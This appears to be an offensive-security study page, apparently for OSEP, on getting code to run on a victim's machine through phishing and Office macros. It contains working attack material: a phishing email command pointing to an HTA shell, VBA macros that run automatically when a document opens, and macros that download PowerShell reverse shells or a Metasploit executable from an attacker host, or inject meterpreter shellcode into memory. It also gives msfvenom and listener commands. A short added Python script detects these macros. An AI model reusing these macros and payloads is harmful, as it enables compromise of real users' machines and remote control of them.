# Client Side Code Execution

## Send email

{% code overflow="wrap" %}

```
sendemail -f admin@domain.com -t victim@domain.com -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"
```

{% endcode %}

## Run from Web Server through [PowerShell In-Memory](/osep/attack/client-side-code-execution/powershell-rev.ps1.md)

{% code title="kali host web server:" %}

```
python -m http.server 80
```

{% endcode %}

<figure><img src="/files/nixP1ed15gtopHyAQowq" alt=""><figcaption><p>scope = document</p></figcaption></figure>

<pre class="language-vba" data-title="macro vba; scope = doc1" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-vba">Sub MyMacro()
    Dim str As String
    <a data-footnote-ref href="#user-content-fn-1">str = "powershell -ep bypass -nop -c iex</a> ((New-Object System.Net.WebClient).DownloadString('<a data-footnote-ref href="#user-content-fn-2">http://192.168.119.120/rev.ps1</a>'))"
    <a data-footnote-ref href="#user-content-fn-3">Shell str, vbHide</a>
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
</code></pre>

{% content-ref url="/pages/rxtUiM1bIJyWGxLdk0jV" %}
[Powershell Inside VBA](/osep/attack/evasions/vba-av-bypass/powershell-inside-vba.md)
{% endcontent-ref %}

## In-Memory Shellcode VBA Macro without `.exe`

{% hint style="warning" %}
For modern x64 MS Office, use `/x64/` shellcode with `Dim res As LongPtr`

`Workbook_Open()` for Excel
{% endhint %}

<pre data-title="VBA Shellcode:" data-overflow="wrap" data-full-width="true"><code><a data-footnote-ref href="#user-content-fn-4">msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication</a>
</code></pre>

{% code title="listener:" overflow="wrap" fullWidth="false" %}

```bash
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
```

{% endcode %}

<pre class="language-vba" data-title="macro vba; scope = doc1" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-vba"><a data-footnote-ref href="#user-content-fn-5">Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr</a>

<a data-footnote-ref href="#user-content-fn-6">Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr</a>

<a data-footnote-ref href="#user-content-fn-7">Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr</a>

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    <a data-footnote-ref href="#user-content-fn-8">buf = Array(232, 130, 0, 0, 0, 96, 137…)</a>

    <a data-footnote-ref href="#user-content-fn-6">addr = VirtualAlloc(0, UBound(buf), &#x26;H3000, &#x26;H40)</a>
    
    <a data-footnote-ref href="#user-content-fn-9">For counter = LBound(buf) To UBound(buf)</a>
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    <a data-footnote-ref href="#user-content-fn-5">res = CreateThread(0, 0, addr, 0, 0, 0)</a>
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
</code></pre>

{% hint style="info" %}
The shell dies when the document is closed; resolve this with the `AutoMigrate` module in MSF
{% endhint %}

{% embed url="<https://www.hackingarticles.in/metasploit-for-pentester-migrate/>" %}

{% content-ref url="/pages/JPBO6AzJwtwDtMEQHKm3" %}
[VBA AV Bypass](/osep/attack/evasions/vba-av-bypass.md)
{% endcontent-ref %}

## VBA `.exe` Shellcode Download & Execute on Disk

{% code title="shell.exe to serve in kali:" overflow="wrap" fullWidth="true" %}

```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
```

{% endcode %}

{% code title="listener:" %}

```bash
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
```

{% endcode %}

{% code title="kali host web server:" %}

```
python -m http.server 80
```

{% endcode %}

<pre class="language-vba" data-title="macro vba; scope = doc1" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-vba">Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('<a data-footnote-ref href="#user-content-fn-10">http://192.168.119.120</a>/<a data-footnote-ref href="#user-content-fn-11">msfstaged.exe</a>', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    <a data-footnote-ref href="#user-content-fn-3">Shell exePath, vbHide</a>

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
</code></pre>

<pre class="language-vba" data-title="IWR alternative MyMacro" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-vba">Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri <a data-footnote-ref href="#user-content-fn-10">http://192.168.119.120/</a><a data-footnote-ref href="#user-content-fn-11">msfstaged.exe</a> -OutFile <a data-footnote-ref href="#user-content-fn-12">C:\temp\</a>msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    <a data-footnote-ref href="#user-content-fn-3">Shell exePath, vbHide</a>

End Sub
</code></pre>
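For defenders triaging documents that carry macros like the three above, the following static check over extracted VBA source flags an auto-run entry point combined with either the `VirtualAlloc`/`RtlMoveMemory`/`CreateThread` import triad or a `Shell` call that launches a PowerShell download. It is an added example, not part of the original notes; the function name `triage`, the finding labels and the sample macros are constructed for illustration, with signatures and payloads stubbed out.

```python
import re

# Auto-run entry points used by the macros on this page (Word and Excel).
AUTOEXEC = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|AutoOpen|Workbook_Open)\b", re.I | re.M)
# Win32 imports declared from VBA; group 1 is the imported function name.
DECLARE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\b", re.I | re.M)
INJECT_APIS = {"virtualalloc", "rtlmovememory", "createthread"}
# Process launch from VBA: the Shell statement or the WScript.Shell COM object.
LAUNCH = re.compile(r'\bShell\s+["\w]|Wscript\.Shell', re.I)
# PowerShell download primitives that appear in the macros above.
CRADLE = re.compile(r"DownloadString|DownloadFile|\bIWR\b|Invoke-WebRequest", re.I)
RWX = re.compile(r"&H40\b", re.I)  # PAGE_EXECUTE_READWRITE literal

def triage(src):
    """Return (verdict, findings) for one module of extracted VBA source."""
    findings = []
    entry = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    if entry:
        findings.append("autoexec:" + ",".join(entry))
    apis = {m.group(1).lower() for m in DECLARE.finditer(src)}
    if INJECT_APIS <= apis:  # all three imports present in one module
        findings.append("inject-api-triad")
        if RWX.search(src):
            findings.append("rwx-alloc")
    if LAUNCH.search(src) and "powershell" in src.lower() and CRADLE.search(src):
        findings.append("ps-download")
    payload = [f for f in findings if not f.startswith("autoexec")]
    verdict = "high" if entry and payload else "review" if findings else "clean"
    return verdict, findings

# Constructed samples: signatures and payloads are stubbed out on purpose.
SAMPLE_INMEM = '''Private Declare PtrSafe Function CreateThread Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" () As LongPtr
Function MyMacro()
    addr = VirtualAlloc(0, 16, &H3000, &H40)
End Function
Sub Document_Open()
    MyMacro
End Sub'''
SAMPLE_CRADLE = '''Sub MyMacro()
    str = "powershell -c (New-Object System.Net.WebClient).DownloadString('http://example.invalid/a')"
    Shell str, vbHide
End Sub
Sub AutoOpen()
    MyMacro
End Sub'''
BENIGN = "Sub FormatReport()\n    Selection.Font.Bold = True\nEnd Sub"
```

Feed it the module text extracted from a document, for example with oletools' `olevba`; a `review` verdict means a single indicator was present without the auto-run pairing.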

[^1]: str = "powershell (New-Object System.Net.WebClient).DownloadString('<http://192.168.119.120/rev.txt>') | IEX"

[^2]: save the [`.ps1`](/osep/attack/client-side-code-execution/powershell-rev.ps1.md#reflection-shellcode-runner-without-add-type-stealthiest) and host in kali web server:

    `python -m http.server 80`

    can also serve txt shellcode

    `sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o shell.txt`

[^3]: Windows Scripting Host alternative:

    `CreateObject("Wscript.Shell").Run str, 0`

[^4]: `buf = Array(232, 130, 0, 0, 0, 96, 137…)`

[^5]: execution

[^6]: allocate memory

[^7]: copy shellcode bytes to allocated memory (P/Invoke Win32 API)

[^8]: `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication`

[^9]: copy shellcode bytes to allocated memory

[^10]: create the `.exe` payload and serve in kali web server:

    `python -m http.server 80`

[^11]: `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe`

[^12]: choose a commonly writable path


